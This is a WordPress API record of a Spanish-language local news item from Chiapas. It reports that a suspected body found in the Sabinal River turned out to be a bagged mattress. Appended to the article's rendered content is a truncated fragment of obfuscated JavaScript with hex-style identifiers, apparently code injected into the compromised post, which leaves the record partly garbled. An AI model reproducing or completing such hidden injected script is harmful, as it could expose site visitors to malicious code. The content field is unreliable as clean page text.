{"id":5088,"date":"2022-09-14T02:46:11","date_gmt":"2022-09-14T02:46:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5088"},"modified":"2022-09-14T02:46:12","modified_gmt":"2022-09-14T02:46:12","slug":"presunto-cuerpo-en-el-sabinal-causa-gran-movilizacion-policiaca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5088","title":{"rendered":"Presunto cuerpo en el Sabinal, causa gran movilizaci\u00f3n polic\u00edaca"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"460\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663123516757-460x1024.jpg\" alt=\"\" class=\"wp-image-5089\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663123516757-460x1024.jpg 460w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663123516757-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663123516757.jpg 575w\" sizes=\"auto, (max-width: 460px) 100vw, 460px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 13 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- La presencia de un presunto cuerpo en el R\u00edo Sabinal, embolsado, caus\u00f3 gran alarma y una fuerte  movilizaci\u00f3n de los cuerpos polic\u00edacos.Los reportes oficiales informaron que la tarde de este martes se report\u00f3 lo que parec\u00eda ser un cuerpo cubierto con pl\u00e1stico en el afluente, a la altura de la Cuarta Oriente, entre Quinta y Sexta Norte, del barrio San Jacinto.Al lugar arrib\u00f3 personal de la polic\u00eda para verificar la situaci\u00f3n.Los uniformados pidieron la presencia de los Bomberos quienes decendieron y realizaron la inspecci\u00f3n del objeto que a simple vista parec\u00eda un cuerpo humano.Tras la valoraci\u00f3n, se percataron que se trataba de una colchoneta embolsada.Las unidades se retiraron del lugar e informaron a los mandos la novedad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 13 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- La presencia de un presunto cuerpo en el R\u00edo Sabinal, embolsado, caus\u00f3 gran alarma y una fuerte movilizaci\u00f3n de los cuerpos polic\u00edacos.Los reportes oficiales informaron que la tarde de este martes se report\u00f3 lo que parec\u00eda ser un cuerpo cubierto con pl\u00e1stico en el afluente, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5089,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5088","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5088"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5088\/revisions"}],"predecessor-version":[{"id":5090,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5088\/revisions\/5090"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5089"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}